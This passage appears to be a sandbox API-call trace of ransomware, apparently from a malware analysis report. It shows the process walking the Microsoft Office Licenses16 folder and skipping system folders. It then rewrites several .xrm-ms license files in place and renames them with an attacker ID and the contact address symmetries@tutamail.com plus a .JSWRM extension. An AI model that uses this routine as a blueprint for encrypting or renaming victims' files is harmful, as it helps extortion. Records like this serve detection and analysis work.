(lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.403] lstrcmpiW (lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.403] lstrcmpiW (lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.403] lstrcmpiW (lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.403] lstrcmpiW (lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.403] lstrcmpiW (lpString1="ProfessionalR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0107.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0107.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0107.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0107.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.404] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0107.404] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0107.404] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0107.406] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.406] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0107.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.407] CloseHandle (hObject=0x45c) returned 1 [0107.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0107.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0107.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0107.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0107.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0107.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0107.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.408] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8a384f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8a384f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8af70c4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29a7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_OEM_Perp-pl.xrm-ms", cAlternateFileName="PR9E8C~1.XRM")) returned 1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.408] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0107.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0107.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0107.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0107.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0107.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0107.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.409] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10663) returned 1 [0107.409] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0107.410] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0107.572] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.572] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0107.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.572] CloseHandle (hObject=0x45c) returned 1 [0107.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0107.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0107.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0107.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0107.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0107.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.573] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0107.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0107.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.574] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe89ec011, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe89ec011, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8ad0e5c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a25, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="PR08B3~1.XRM")) returned 1 [0107.574] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0107.574] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0107.574] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0107.574] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0107.575] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.575] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.575] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.575] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.575] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.575] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0107.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0107.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0107.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0107.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.576] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23077) returned 1 [0107.576] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a20) returned 0x24c1d0 [0107.576] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a20, lpOverlapped=0x0) returned 1 [0107.579] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.579] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a20, lpOverlapped=0x0) returned 1 [0107.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.579] CloseHandle (hObject=0x45c) returned 1 [0107.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0107.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0107.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0107.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0107.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0107.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0107.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.580] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0107.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0107.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0107.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.581] HeapFree (in: hHeap=0x1e0000, 